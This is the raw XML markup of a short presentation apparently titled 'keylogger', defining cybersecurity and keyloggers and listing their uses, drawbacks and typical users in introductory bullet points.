              <a:t>Cybersecurity is the practice of protecting systems, networks, and programs from digital attacks. These cyber attacks are usually aimed at accessing, changing, or destroying sensitive information  extorting money from users or interrupting normal business processes. Implementing effective cybersecurity measures is particularly challenging today because there are more devices than people, and attackers are becoming more innovative.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89514" y="1509434"/>
            <a:ext cx="16581124" cy="11064132"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="11064132" w="16581124">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16581124" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16581124" y="11064131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="110641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182000"/>
            <a:ext cx="1696903" cy="1693401"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1693401" w="1696903">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1696903" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1696903" y="1693400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1693400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5">
              <a:alphaModFix amt="62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569571" y="5210109"/>
            <a:ext cx="11621009" cy="1756358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3467"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2477">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>A keylogger (short for keystroke logger) is a type of surveillance technology used to monitor and record each keystroke made on a keyboard. Keyloggers can be either hardware devices or software programs. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4912295" y="2789642"/>
            <a:ext cx="8935562"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rPr>
              <a:t>KEYLOGGER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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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576526" y="0"/>
            <a:ext cx="8711474" cy="9432517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9432517" w="8711474">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8711474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8711474" y="9432517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9432517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-22184" t="0" r="-22184" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2292861"/>
            <a:ext cx="8935562"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rPr>
              <a:t>ADVANTAGES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="4097338"/>
            <a:ext cx="15264024" cy="2880602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Monitoring Employee Productivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Parental Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>IT and Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Legal and Law Enforcement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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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65423" y="-283278"/>
            <a:ext cx="10351985" cy="10263586"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="10263586" w="10351985">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10351985" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10351985" y="10263586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10263586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-16097" t="0" r="-16097" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="221423" y="2253925"/>
            <a:ext cx="9144000" cy="1047054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6606"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11010">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="RQND Pro"/>
              </a:rPr>
              <a:t>DISADVANTAGES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="491783" y="3918366"/>
            <a:ext cx="15264024" cy="3456105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Privacy Invasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Security Risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Legal and Ethical Issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Technical Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="702449" indent="-351224" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4555"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3253">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Lack of Transparency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2576341" y="1801985"/>
            <a:ext cx="3086100" cy="2652117"/>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095757" y="5832898"/>
            <a:ext cx="3086100" cy="2652117"/>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328126" y="2091882"/>
            <a:ext cx="7101947" cy="6103235"/>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28274" t="0" r="-712" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1653780" y="3792008"/>
            <a:ext cx="4853464" cy="3583940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="626109" indent="-313054" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4059"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2899">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Corporate agents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="626109" indent="-313054" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4059"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2899">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Cyber criminals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="626109" indent="-313054" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4059"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2899">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Employers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="626109" indent="-313054" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4059"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2899">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Educational institutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="626109" indent="-313054" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4059"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2899">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Parents or guardians</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="626109" indent="-313054" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4059"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2899">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Ethical hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="626109" indent="-313054" lvl="1">
              <a:lnSpc>
                <a:spcPts val="4059"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2899">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Spy’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1653780" y="2091882"/>
            <a:ext cx="5292718" cy="989330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7735"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>END USERS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DAGHW18dBvk</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>keylogger</dc:title>
</cp:coreProperties>
</file>